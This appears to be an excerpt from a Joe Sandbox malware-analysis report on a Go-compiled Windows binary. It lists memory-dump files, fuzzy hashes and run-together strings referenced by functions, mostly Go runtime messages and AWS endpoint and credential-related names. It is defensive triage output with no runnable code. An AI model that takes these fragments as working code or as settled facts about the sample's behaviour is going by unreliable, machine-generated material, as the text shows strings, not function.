Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: !$" not supported for cpu option "acm-fips.ca-west-1.amazonaws.comacm-fips.us-east-1.amazonaws.comacm-fips.us-east-2.amazonaws.comacm-fips.us-west-1.amazonaws.comacm-fips.us-west-2.amazonaws.comapi.ecr.af-south-1.amazonaws.comapi.ecr.ap-south-1.amazonaws.comapi.$", missing CPU supportVariantTimeToSystemTimeSafeArrayCreateVectorExUS West (N. California)application-autoscalingentitlement.marketplacelogs.af-south-1.api.awslogs.ap-south-1.api.awslogs.ap-south-2.api.awslogs.eu-north-1.api.awslogs.eu-south-1.api.awslogs.eu$GODEBUG: can not enable "unexpected key value typeWindowsGetStringRawBufferSouth America (Sao Paulo)appmesh.ap-east-1.api.awsappmesh.eu-west-1.api.awsappmesh.eu-west-2.api.awsappmesh.eu-west-3.api.awsappmesh.sa-east-1.api.awsappmesh.us-east-1.api.awsappmesh.us$GODEBUG: no value specified for "unaligned 64-bit atomic operationappmesh-fips.ca-central-1.api.awsbedrock-runtime-fips-ca-central-1cloudcontrolapi.ap-east-1.api.awscloudcontrolapi.ca-west-1.api.awscloudcontrolapi.eu-west-1.api.awscloudcontrolapi.eu-west-2.api$GODEBUG: unknown cpu feature "{service}.{region}.{dnsSuffix}appmesh.ap-northeast-1.api.awsappmesh.ap-northeast-2.api.awsappmesh.ap-northeast-3.api.awsappmesh.ap-southeast-1.api.awsappmesh.ap-southeast-2.api.awsappmesh.ap-southeast-3.api.awsappmesh-fips.us-east$GODEBUG: value "CoCreateInstanceSafeArrayDestroyDispatchMessageWamazonaws.com.cnCanada (Central)Europe (Ireland)US West (Oregon)amplifyuibuilderapi.fleethub.iotapp-integrationsbillingconductorcognito-identityelasticbeanstalkelasticmapreduceIngestionServiceinge$cpu.
API String ID: 0-371206981
Opcode ID: 17cd9c646d59cc711bf8d0cc86331930ac985358280a4d446e9eb4c06c4bfddf
Instruction ID: c62a5c7410c69294d5d7f315854b224537e79e7ad0f9bf754e82b37288d99be7
Opcode Fuzzy Hash: 17cd9c646d59cc711bf8d0cc86331930ac985358280a4d446e9eb4c06c4bfddf
Instruction Fuzzy Hash: 72D19EB46083A48FC714EF65C48096EBBF5AF88314F54896DE886DB346D770D944DB82

Function 00B010C0 Relevance: 10.2, Strings: 8, Instructions: 239COMMON

Download Yara Rule

Strings

s.limit= s.state= B work ( B exp.) marked unmarked in use), size = , tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=[ lockedm=interruptbus errorFindCloseLocalFre, xrefs: 00B011AB
) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on , xrefs: 00B0140E
*(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMS, xrefs: 00B013BA
s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidS, xrefs: 00B01335
s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= runtime: pid=: unknown pc called from level 3 reset, xrefs: 00B011D5
s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc=, xrefs: 00B01181
unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_, xrefs: 00B012A5
... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamil1562578125, xrefs: 00B01389, 00B01494

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMS$ ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamil1562578125$ s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc=$ s.limit= s.state= B work ( B exp.) marked unmarked in use), size = , tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=[ lockedm=interruptbus errorFindCloseLocalFre$ s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= runtime: pid=: unknown pc called from level 3 reset$ s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidS$) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on $unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_
API String ID: 0-2412629081
Opcode ID: 56c6615f85a01c607000b058592833c43784b33dd98206a76130b6d2dc115d10
Instruction ID: f6fab80dfc0030ade431e65e60fdc6dfd4fd20bd3f4a2eba86b6c43c823ba63d
Opcode Fuzzy Hash: 56c6615f85a01c607000b058592833c43784b33dd98206a76130b6d2dc115d10
Instruction Fuzzy Hash: 07B1D7B45897049FC344EFA4C1816AEBBE0AF89744F8188ADF48987352D7749988DF92

Function 00AE9130 Relevance: 10.2, Strings: 8, Instructions: 218COMMON

Download Yara Rule

Strings

pointerBAD RANK status unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_New, xrefs: 00AE9404
called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller , xrefs: 00AE93DE
panicwrap: no ) in called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (ea, xrefs: 00AE9473
value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads=, xrefs: 00AE935D
panicwrap: unexpected string after type name: memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to , xrefs: 00AE92C9
panicwrap: no ( in panicwrap: no ) in called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free , xrefs: 00AE94D0
panicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left ou, xrefs: 00AE9208
., xrefs: 00AE92D3

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller $ pointerBAD RANK status unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_New$.$panicwrap: no ( in panicwrap: no ) in called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free $panicwrap: no ) in called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (ea$panicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left ou$panicwrap: unexpected string after type name: memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to $value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads=
API String ID: 0-23595788
Opcode ID: 24b434533f123c1b159c5d9adee8c35d23429dfc24d58582eab3ddcd0be2b200
Instruction ID: 686a0bbe967373afedcf838ac4d54816ffe4df2ccb5fa0e215487183af5fc274
Opcode Fuzzy Hash: 24b434533f123c1b159c5d9adee8c35d23429dfc24d58582eab3ddcd0be2b200
Instruction Fuzzy Hash: 6AB190B4A083859FD324DF25D194B9EBBE1BF88300F50896EE8C987351DB74A948DB53

Function 00B175E0 Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownunable to load x509 key pair from c, xrefs: 00B17904
runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 00B1784E
CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=syscall: string with NUL passed to StringToUTF16credential type %s requires role_arn, profile %sclient region does n, xrefs: 00B178DD
runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typet, xrefs: 00B17938
%, xrefs: 00B17941
runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownunable to load x509 key pair from client certx-amz-server-side-encryption-custom, xrefs: 00B178A9
VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: cannot spliceSetFileCompletionNotificationModes: day-of-year does not, xrefs: 00B17882
bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHa, xrefs: 00B17827

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: %$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=syscall: string with NUL passed to StringToUTF16credential type %s requires role_arn, profile %sclient region does n$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: cannot spliceSetFileCompletionNotificationModes: day-of-year does not$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHa$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownunable to load x509 key pair from c$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typet$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownunable to load x509 key pair from client certx-amz-server-side-encryption-custom$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
API String ID: 0-1897794894
Opcode ID: 9fe0af569e26f4d7d225c8fdbe62b1193517589488dfc5a518f0a534ba3dcd4e
Instruction ID: 05e1225d1bac427e581f5fd6a2ebd9512fcac5646c7a79b2d1fc16a7c72e9778
Opcode Fuzzy Hash: 9fe0af569e26f4d7d225c8fdbe62b1193517589488dfc5a518f0a534ba3dcd4e
Instruction Fuzzy Hash: 3891E0B45497058FC300EF68C189B9ABBF4FF89754F5089ACE48887391DB749988DF92

Function 00B07060 Relevance: 10.1, Strings: 8, Instructions: 126COMMON

Download Yara Rule

Strings

mismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did n, xrefs: 00B07242
pacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assig, xrefs: 00B07162
MB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetNtVersionNumbers, xrefs: 00B071CF
sweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countinvalid or inco, xrefs: 00B07258
1, xrefs: 00B07261
pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine , xrefs: 00B071F9
MB; allocated timeEndPeriod, xrefs: 00B0718C
pages/byte s.sweepgen= allocCount end tracegcProcessPrng, xrefs: 00B0721F

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
